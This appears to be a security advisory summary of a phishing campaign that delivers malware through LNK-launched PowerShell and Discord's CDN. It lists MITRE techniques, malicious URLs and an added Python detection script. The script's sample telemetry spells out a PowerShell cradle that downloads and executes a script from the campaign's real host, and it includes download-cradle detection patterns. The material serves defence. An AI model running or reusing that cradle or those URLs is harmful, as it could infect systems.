New Phishing Campaign Leverages Discord for Payload Delivery – ThreatDown by Malwarebytes

A new phishing campaign uses Discord’s Content Delivery Network (CDN) to deliver malicious payloads via a zipped attachment and a PowerShell-based download chain. ThreatDown MDR recommends immediate endpoint isolation and blocking the implicated Discord CDN URLs to mitigate further impact.
#ByelongBound.exe #FASF240110.pdf #pumairld.txt #viverosmarinos #ThreatDownMDR

Keypoints

  • The phishing campaign was identified after an MDR client clicked on a malicious zip file.
  • The attack started with an email containing a zip file named DOCUMENT-12545403-8265-5454-434354-430854546.zip.
  • Inside the zip was an LNK shortcut that executed a PowerShell command to download code from a remote text file.
  • The remote text file viverosmarinos[.]com/pumairld.txt downloaded ByelongBound.exe and FASF240110.pdf from Discord’s CDN and executed them.
  • The campaign leveraged two Discord CDN endpoints to host the payloads.
  • Mitigation included endpoint isolation, password updates, system re-imaging, and blocking specific URLs to disrupt the chain.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing Attachment – An end user receives an email containing a zip file disguised as a PDF that initiates the infection when opened. “The attack began on June 19, 2024, when an end user was sent an email containing a zip file named DOCUMENT-12545403-8265-5454-434354-430854546.zip.”
  • [T1059.001] PowerShell – Command and Scripting Interpreter: PowerShell – A PowerShell command in a shortcut downloads and runs code from a remote .txt file. “The LNK file contained a PowerShell command to download and run PowerShell code from a remote .txt file.”
  • [T1204.002] User Execution – Malicious File – The user clicked the LNK file thinking it opened a PDF, triggering the infection. “they inadvertently initiated the infection process.”
  • [T1105] Ingress Tool Transfer – The remote text file directs the download of additional payloads from Discord’s CDN. “downloaded a text file… which downloaded a malicious executable, ByelongBound.exe, and a PDF, FASF240110.pdf, from Discord’s CDN.”

Indicators of Compromise

  • [URL] viverosmarinos[.]com/pumairld.txt – hosting the remote PowerShell payload script
  • [URL] cdn.discordapp[.]com/attachments/1232305208034463761/1252890126124585021/ByelongBound.exe – hosting the executable
  • [URL] cdn.discordapp[.]com/attachments/1232305208034463761/1252890163399364659/FASF240110.pdf – hosting the PDF payload
  • [File] ByelongBound.exe – malicious executable downloaded from Discord CDN
  • [File] FASF240110.pdf – malicious PDF downloaded from Discord CDN
  • [File] pumairld.txt – remote text file that drives payload retrieval
  • [ZIP] DOCUMENT-12545403-8265-5454-434354-430854546.zip – email attachment used in initial phishing delivery
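The following is an added detection example, not code from ThreatDown or the original post. It covers both the two-stage chain mapped above (T1059.001 cradle from an LNK, then T1105 retrieval from Discord's CDN) and the IoC list: it triages constructed process-creation and web-proxy events, matching the advisory's exact indicators plus two generic rules (a PowerShell download cradle spawned by explorer.exe, and a script host fetching from `cdn.discordapp.com/attachments/`). The event field names and sample telemetry are assumptions for illustration.

```python
import re

# Indicators quoted in the advisory above, kept defanged as published.
IOC_URLS = [
    "viverosmarinos[.]com/pumairld.txt",
    "cdn.discordapp[.]com/attachments/1232305208034463761/1252890126124585021/ByelongBound.exe",
    "cdn.discordapp[.]com/attachments/1232305208034463761/1252890163399364659/FASF240110.pdf",
]
# Generic stage-2 rule: any file served from Discord's attachment CDN.
DISCORD_CDN = re.compile(r"cdn\.discordapp\.com/attachments/", re.I)
# Generic stage-1 rule: PowerShell download-and-run cradles typical of LNK lures.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def refang(s):
    return s.replace("[.]", ".")

def analyze(event):
    """Return the reasons one telemetry event is suspicious; [] if nothing matched."""
    reasons = []
    text = refang(event.get("command_line") or event.get("url") or "")
    for ioc in IOC_URLS:                       # exact-indicator match, any event type
        if refang(ioc).lower() in text.lower():
            reasons.append("known IoC: " + ioc)
    if event["type"] == "process":             # stage 1: LNK double-click -> explorer.exe -> powershell.exe
        child = event["image"].lower().endswith("powershell.exe")
        from_explorer = event["parent_image"].lower().endswith("explorer.exe")
        if child and from_explorer and CRADLE.search(text):
            reasons.append("PowerShell download cradle spawned by explorer.exe (LNK-style user execution)")
    elif event["type"] == "web":               # stage 2: script host pulling payloads from Discord CDN
        if event["process"].lower() in SCRIPT_HOSTS and DISCORD_CDN.search(text):
            reasons.append("script host fetching from Discord attachment CDN: " + event["process"])
    return reasons

def triage(events):
    """Flatten all (host, reason) hits across a batch of events."""
    return [(e["host"], r) for e in events for r in analyze(e)]

# Constructed sample telemetry (not real logs): WS01 mirrors the advisory's chain, WS02 is benign.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://viverosmarinos.com/pumairld.txt')\""},
    {"type": "web", "host": "WS01", "process": "powershell.exe",
     "url": "https://cdn.discordapp.com/attachments/1232305208034463761/1252890126124585021/ByelongBound.exe"},
    {"type": "web", "host": "WS02", "process": "chrome.exe",
     "url": "https://cdn.discordapp.com/attachments/1111111111/2222222222/holiday.png"},  # constructed benign fetch
    {"type": "process", "host": "WS02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "command_line": "powershell Get-Process"},
]
```

Exact IoC matches go stale once the actor rotates attachment IDs, so the two generic rules carry the long-term value; a browser fetching from the Discord CDN is deliberately not flagged, since that is routine traffic.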

Read more: https://www.threatdown.com/blog/new-phishing-campaign-uses-discord-for-payload-delivery/